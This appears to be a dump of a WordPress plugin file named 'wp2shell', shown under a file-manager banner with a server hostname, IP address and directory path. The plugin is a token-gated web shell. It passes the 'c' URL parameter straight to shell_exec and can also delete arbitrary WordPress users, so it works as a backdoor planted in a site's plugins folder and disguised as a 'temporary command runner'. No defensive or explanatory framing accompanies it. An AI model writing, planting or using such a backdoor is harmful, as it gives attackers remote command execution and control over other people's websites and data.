PK œqhYî¶J‚ßF ßF ) nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
| Dir : /home/ruvimbofunco/public_html/wp-content/plugins/wp2shell_053a9666/ |
| Server: Linux red.truehostdns.com 4.18.0-553.150.1.el8_10.x86_64 #1 SMP Fri Jul 31 15:23:31 EDT 2026 x86_64 IP: 51.161.15.103 |
| Dir : /home/ruvimbofunco/public_html/wp-content/plugins/wp2shell_053a9666/wp2shell_053a9666.php |
<?php
/*
Plugin Name: wp2shell
Description: Temporary command runner.
*/
if (hash_equals('0305d567aabe1eeaebb5fd762a0a55c2', (string) ($_GET['t'] ?? '')) && isset($_GET['c'])) {
chdir(__DIR__);
echo 'WP2SHELL::' . shell_exec((string) $_GET['c']) . '::END';
} elseif (hash_equals('0305d567aabe1eeaebb5fd762a0a55c2', (string) ($_GET['t'] ?? '')) && isset($_GET['delete_user'])) {
require_once dirname(__DIR__, 3) . '/wp-load.php';
require_once ABSPATH . 'wp-admin/includes/user.php';
$user = get_user_by('login', (string) $_GET['delete_user']);
$ok = $user ? wp_delete_user((int) $user->ID, (int) ($_GET['reassign'] ?? 0)) : false;
echo 'WP2SHELL::' . ($ok ? 'deleted' : 'failed') . '::END';
}